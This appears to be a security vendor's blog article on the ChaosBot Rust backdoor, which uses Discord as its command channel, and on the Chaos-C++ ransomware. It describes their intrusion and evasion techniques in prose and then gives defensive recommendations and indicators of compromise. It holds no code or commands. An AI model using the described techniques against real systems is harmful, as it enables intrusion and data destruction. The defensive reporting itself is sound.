ChaosBot: The Rust‑Based Malware Using Discord and Destroying Files

A new malware is alarming cybersecurity experts: ChaosBot, a backdoor written in Rust that uses Discord as its command‑and‑control (C2) channel. Alongside it, an even more dangerous evolution of the Chaos ransomware, now featuring file‑destruction and clipboard hijacking, has emerged.

According to reports from eSentire and Fortinet, these threats reveal a growing ecosystem that blends credential theft, social engineering, reverse tunneling, and advanced evasion techniques.

At TecnetOne, we explain how this attack works, why it’s especially dangerous, and how you can defend your organization.

What Is ChaosBot and How It Spreads

ChaosBot is a Rust‑based backdoor first detected in September 2025 within a financial services firm.

It allows attackers to execute remote commands, steal files, and maintain persistent access to compromised systems.

Initial access typically comes through stolen or misconfigured credentials. In one observed case, the attackers used an overprivileged Active Directory account and compromised VPN credentials, deploying the malware via WMI (Windows Management Instrumentation).

Other variants spread through phishing emails with malicious .LNK shortcuts that launch PowerShell commands, downloading the payload from external servers while showing a decoy PDF, such as a fake “State Bank of Vietnam” notice.

How ChaosBot Operates

ChaosBot is technically sophisticated and blends seamlessly with legitimate Windows processes.

Key capabilities include:

1. Rust‑based persistence: Loads its main payload (msedge_elf.dll) via DLL sideloading, exploiting a legitimate Microsoft Edge binary (identity_helper.exe).
   
   
2. Discord‑based C2: Operators create Discord accounts and channels mimicking victims’ names to send commands, exfiltrate data, and manage files—making traffic appear legitimate.
   
   
3. Reverse proxy tunneling: Downloads FRP (Fast Reverse Proxy) to maintain constant access, and sometimes abuses VS Code Tunnel as an alternative backdoor.
   
   
4. Core functions: Executes PowerShell commands, captures screenshots, uploads/downloads files, and communicates with C2 in real time.
   
   
5. Evasion: Disables Event Tracing for Windows (ETW) in ntdll!EtwEventWrite and checks for virtual environments like VMware or VirtualBox to avoid sandbox analysis.

In essence, ChaosBot is a remote‑access espionage tool disguised as legitimate software—capable of lateral movement and stealthy data exfiltration.

Read more: APT36 Hackers Use .desktop Files on Linux to Spread Malware

Chaos‑C++ Ransomware: The Second Phase

While ChaosBot serves as the reconnaissance and access tool, the Chaos‑C++ ransomware delivers the destructive blow.

According to Fortinet FortiGuard Labs, this upgraded variant merges encryption, file deletion, and clipboard hijacking to maximize damage.

Most destructive features:

1. Permanent file deletion: Files larger than 1.3 GB are deleted instead of encrypted—making recovery impossible.
   
   
2. Clipboard hijacking: Monitors and replaces cryptocurrency addresses with the attacker’s wallet.
   
   
3. Adaptive execution: If %APPDATA%\READ_IT.txt exists, it enters surveillance mode; otherwise, it disables recovery options and encrypts files under 50 MB.
   
   
4. Hybrid encryption: Uses combined symmetric/asymmetric methods with XOR to corrupt files even if encryption fails.

This evolution shows that Chaos‑C++ aims not only to extort but to cause irreversible loss, amplifying pressure on victims.

How Victims Are Targeted

ChaosBot and Chaos‑C++ primarily target corporate networks with exposed services—VPNs, RDP, or admin accounts—and organizations lacking network segmentation.

Their use of Discord for C2 makes detection difficult since the traffic runs through a legitimate platform.

Techniques like DLL sideloading and malicious LNK phishing remain highly effective, especially against untrained users.

Attack Chain diagram  (Source: esentire.com)

The Risks for Businesses

These campaigns can devastate victims within hours, leading to:

1. Total data loss with no recovery options
   
   
2. Extended operational downtime
   
   
3. Theft of sensitive data—credentials, financials, IP
   
   
4. Severe reputational and legal consequences

The combination of espionage (ChaosBot) and destruction (Chaos‑C++) forms a hybrid attack that merges ransomware, trojans, and advanced persistence.

Similar titles: How and where do hackers hide their malware code?

How to Defend Against the Chaos Ecosystem

At TecnetOne, we recommend a defense‑in‑depth approach combining access control, technical safeguards, and employee awareness.

Credentials and Access

1. Immediately change VPN and service account passwords.

1. Enforce multi‑factor authentication (MFA) on all remote logins.

1. Apply least‑privilege and JIT/JEA (Just‑In‑Time / Just‑Enough‑Admin) principles.

Endpoints and Monitoring

1. Flag unusual DLLs or processes such as identity_helper.exe loading non‑standard libraries.

1. Track PowerShell commands run from shortcuts or temp folders.

1. Detect modified calls to ntdll!EtwEventWrite.

1. Monitor outbound connections to Discord or FRP tunnels.

Network Controls

1. Block or inspect Discord connections in corporate environments.

1. Restrict reverse‑proxy tools and inspect TLS traffic for anomalies.

1. Enforce strict egress filtering to prevent data exfiltration.

Email Security and Awareness

1. Block .LNK attachments or convert them to safe previews.

1. Train staff to recognize phishing and fake PDFs.

Backups

1. Maintain immutable, offline (air‑gapped) backups.

1. Test restoration regularly.

1. Limit backup‑system permissions to prevent deletion.

Early Detection and Response

Early detection is crucial. Look for:

1. Unusual Discord API activity

1. Unknown files like msedge_elf.dll or identity_helper.exe

1. New persistent services or tunnels (FRP, VS Code Tunnel)

1. Creation of %APPDATA%\READ_IT.txt

If any indicators appear, isolate affected devices, perform forensic analysis, and review remote‑access logs (WMI, RDP, VPN).

Conclusion

ChaosBot and Chaos‑C++ represent a new generation of modular malware—intelligent, destructive, and engineered to evade detection.

Their abuse of legitimate channels like Discord and their advanced persistence mechanisms make them formidable threats.

The best defense is anticipation: reinforce identity controls, monitor networks in real time, and educate your teams on early detection.

At TecnetOne, we help organizations prevent, detect, and respond to complex threats like ChaosBot through adaptive, intelligence‑driven cybersecurity.

Because today, cybersecurity isn’t just about protecting systems—it’s about protecting business continuity.